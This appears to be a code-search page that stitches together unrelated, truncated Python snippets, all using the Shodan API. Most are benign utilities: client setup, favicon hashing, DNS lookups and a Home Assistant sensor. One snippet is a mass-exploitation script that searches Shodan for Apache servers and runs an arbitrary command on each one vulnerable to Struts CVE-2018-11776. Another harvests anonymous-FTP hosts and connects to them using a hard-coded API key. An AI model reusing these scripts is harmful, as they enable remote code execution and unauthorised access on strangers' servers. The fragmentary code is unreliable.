Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
def run(self):
if self.keyFile:
self.shodan = Shodan(open(self.keyFile, "r").readline().strip())
elif self.key:
self.shodan = Shodan(self.key)
elif self.shodanCLI:
self.shodan = Shodan(get_api_key())
else:
print('[x] Wrong input API key type.')
exit(1)
if self.faviconFile or self.fileList:
self.fileList.extend(self.faviconFile)
for fav in self.fileList:
self._iterator.set_description(f"[+] iterating over favicon files | processing {fav}")
self._iterator.update(1)
data = open(fav, 'rb').read()
_fH = self.faviconHash(data)
self.faviconsList.append({
'favhash': _fH,
'file': fav,
def get_shodan_client():
"""
Initializes a shodan client using the API defined in the pyonionscan.cfg file and returns the client. Exits if
api_key is not defined in config.
:return shodan_client:
"""
shodan_api_key = config['Shodan']['api_key']
if shodan_api_key:
shodan_client = shodan.Shodan(shodan_api_key)
return shodan_client
else:
sys.exit("Shodan API Key not found. Please check your config.")
def init(api_key):
"""
Initialize the Shodan API
"""
# load api key and print credits
api = shodan.Shodan(SHODAN_API_KEY)
info(api)
return api
def account_info(self):
try:
if not self.api_key:
colorprint.red("[-] Shodan api cant not be Null")
sys.exit()
api = Shodan(self.api_key)
account_info = api.info()
msg = "[+] Available Shodan query credits: %d" % account_info.get('query_credits')
colorprint.green(msg)
except APIError as e:
colorprint.red(e)
sys.exit()
return True
if res.status_code == 302 and res.headers.get('Location') is not None and str(r3) in res.headers.get('Location'):
urlThree = res.headers.get('Location')
retval |= str(r3) in urlThree
except:pass
finally:
if retval:
print('[*] URL {} s2-057 CVE-2018-11776 is VULNERABLE!'.format(url))
exploit(url,command)
else:
print('[*] URL {} s2-057 CVE-2018-11776, not VULNERABLE!'.format(url))
if __name__ == '__main__':
command = input("[*] Command to EXECUTE on all affected servers: ") or 'id'
api = shodan.Shodan(SHODAN_API_KEY)
try:
query = input("[*] Use Shodan API to search for affected Apache Struts servers? : ").lower()
if query.startswith('y'):
print('')
print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
results = api.search('Server: Apache') # CHANGE SEARCH PARAM FOR ACCURACY
print('[✓] API Key Authentication: SUCCESS')
print('[~] Number of present Apache Servers: %s' % results['total'])
print('')
engage = input ("[*] Begin attempting CVE-2018-11776 exploitation in each Apache server? : ").lower()
if engage.startswith('y'):
for result in results['matches']:
poc(result['ip_str'])
except shodan.APIError as e:
print('[✘] Error: %s' % e)
option = input('[*] Would you like to change API Key? : ').lower()
import ftplib
import shodan
import socket
ips =[]
shodanKeyString = 'v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kik'
shodanApi = shodan.Shodan(shodanKeyString)
results = shodanApi.search("port: 21 Anonymous user logged in")
for match in results['matches']:
if match['ip_str'] is not None:
ips.append(match['ip_str'])
print("Sites found: %s" %len(ips))
for ip in ips:
try:
print(ip)
#server_name = socket.gethostbyaddr(str(ip))
server_name = socket.getfqdn(str(ip))
print("Connecting to ip: " +ip+ " / Server name:" + server_name[0])
def domain_info(domain, details, save, history, type):
"""View all available information for a domain"""
key = get_api_key()
api = shodan.Shodan(key)
try:
info = api.dns.domain_info(domain, history=history, type=type)
except shodan.APIError as e:
raise click.ClickException(e.value)
# Grab the host information for any IP records that were returned
hosts = {}
if details:
ips = [record['value'] for record in info['data'] if record['type'] in ['A', 'AAAA']]
ips = set(ips)
fout = None
if save:
filename = u'{}-hosts.json.gz'.format(domain)
fout = helpers.open_file(filename)
def shodan_scan(shoda_api_token, domain):
api = Shodan(shoda_api_token)
try:
scan = api.scan(domain)
except APIError as e:
print ("## domain {0} - shodan scanning error: {1}".format(domain, e.value))
return []
# Start listening for results
done = False
while not done:
print ("## domain {0} - shodan scanning".format(domain))
time.sleep(2)
scan = api.scan_status(scan['id'])
if scan['status'] == 'DONE':
done = True
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Shodan sensor."""
api_key = config.get(CONF_API_KEY)
name = config.get(CONF_NAME)
query = config.get(CONF_QUERY)
data = ShodanData(shodan.Shodan(api_key), query)
try:
data.update()
except shodan.exception.APIError as error:
_LOGGER.warning("Unable to connect to Shodan.io: %s", error)
return False
add_entities([ShodanSensor(data, name)], True)